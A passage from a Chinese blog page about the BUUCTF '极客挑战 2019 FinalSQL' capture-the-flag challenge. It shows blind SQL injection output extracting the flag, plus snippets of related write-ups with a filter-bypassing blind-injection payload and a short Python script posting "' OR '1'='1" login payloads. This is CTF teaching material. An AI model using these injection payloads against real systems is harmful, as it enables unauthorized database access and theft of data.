列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4b
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b47
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-7
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-734
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-7344
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0d
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0db
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0dbb
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0dbb4
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0dbb43
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0dbb43}
列值: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{edc2283e-c340-4bb3-b477-73448d0dbb43}
你需要的flag为:flag{edc2283e-c340-4bb3-b477-73448d0dbb43}

进程已结束,退出代码0

那么,为什么放这么长的回显呢?

当然是怕你寂寞啦╮( ̄▽  ̄)╭

继续刷题学习喽~

buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 883
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
BUUCTF [极客挑战 2019]FinalSQL
Chu_Jian_Xiong的博客
10-14 1432
[极客挑战 2019]FinalSQL操作脚本总结 操作 打开题目,又是这个鬼 跟着他的流程走,点按钮 让我们试试别的 告诉我们对了,但是不是这张表(埋坑) 怀疑这个地址是存在sql注入的,经过fuzz,发现过滤了空格,union之类的关键字,经过一系列的尝试,猜想后台原句 select * from 表 where id=1 通过构造语句,发现正确的页面回显 ''or(ascii(substr(database(),1,1))>32) 接下来就是拿脚本盲注了注入了 以下是注入发现的信息
BUUCTF[极客挑战 2019]HardSQL 详细思路
最新发布
shsisbdkka的博客
04-24 1037
之前一般的查询语句为 select table_name from information_schema.tables where table_schema=database() 但是在过滤空格的极端环境下我们要用其他符号来做分隔。***第二个参数:表达式不符合语法规范时,MySQL会返回错误信息,而这个错误信息中会包含我们构造的查询结果。)但是#的代替方式%23没被过滤,还可以尝试一下能不能正常登录的(把后面的密码注释掉)尝试了好多种注入但是都被拦截过滤了,用字典扫一下看看,有没有哪些没过滤。
Buuctf [极客挑战 2019]FinalSQL
m_de_g的博客
03-20 1109
【代码】Buuctf [极客挑战 2019]FinalSQL
[极客挑战 2019]FinalSQL
D.MIND 的博客
04-03 231
前言: 记录一道SQL注入题,用到了异或注入,确认过眼神,是我没掌握的知识点 异或有两种: ^ 和 xor ^ 是前后进行二进制层面的异或运算 xor 是逻辑上的异或操作,对前后两个逻辑真假进行异或 最简单的两个例子: MariaDB [test]> select 1^1; +-----+ | 1^1 | +-----+ | 0 | +-----+ MariaDB [test]> select 1^0; +-----+ | 1^0 | +-----+ | 1 | +-----+ Ma
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 836
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 960
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
ccc6553584的博客
04-03 1057
输入11"时,没有SQL语句报错,只是提示我们输入的值是不对的,因此我们可以先假设SQL语句闭合方式是单引号username输入1时,形成的sql语句是username输入1"时,形成的sql语句是正确的当字符串内需要包含双引号时,除了使用转义字符外,也可以使用一对单引号来包括字符串。字符串内的双引号被视为普通字符,无需特殊处理同理,当字符串内需要包含单引号时,除了使用转义字符外,也可以使用一对双引号来包括字符串。字符串内的单引号被视为普通字符,无需特殊处理username输入的是1'
[极客挑战 2019]FinalSQL 1
plant1234的博客
04-30 2128
[极客挑战 2019]FinalSQL 1 首先打开题目,发现是一个sql注入: 寻找注入点发现注入点在: 发现是一个盲注,且过滤了and和空格等 并且直接盲注比较慢,还需要利用二分法来编写脚本 佬脚本: import requests url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php" flag = '' def payload(i, j): sql = "1^(ord(
Buuctf-Web-[极客挑战 2019]EasySQL1 代码
12-28
### Buuctf Web 极客挑战 2019 EasySQL1 解题代码 对于Buuctf Web中的极客挑战2019之EasySQL1,由于该题目存在未对输入参数进行适当过滤的情况,可以利用这一特性通过SQL注入的方式完成解题。下面展示的是基于此逻辑构建的攻击向量实现方式。 #### 使用Python脚本模拟请求并获取Flag ```python import requests url = "http://example.com/login" # 替换成实际地址 payload = { 'username': "' OR '1'='1", 'password': "' OR '1'='1" } response = requests.post(url, data=payload) if "flag{" in response.text: start_index = response.text.find("flag{") end_index = response.text.find('}', start_index) + 1 flag = response.text[start_index:end_index] print(f"The obtained flag is: {flag}") else: print("Failed to obtain the flag.") ``` 上述代码展示了如何构造一个简单的POST请求来发送含有SQL注入语句的数据包给目标网站,并从中提取返回页面内的`flag`字符串[^1]。 需要注意的是,在真实环境中应当合法合规地参与CTF竞赛活动,不得用于非法目的或损害他人利益的行为上。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

矢量克罗斯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值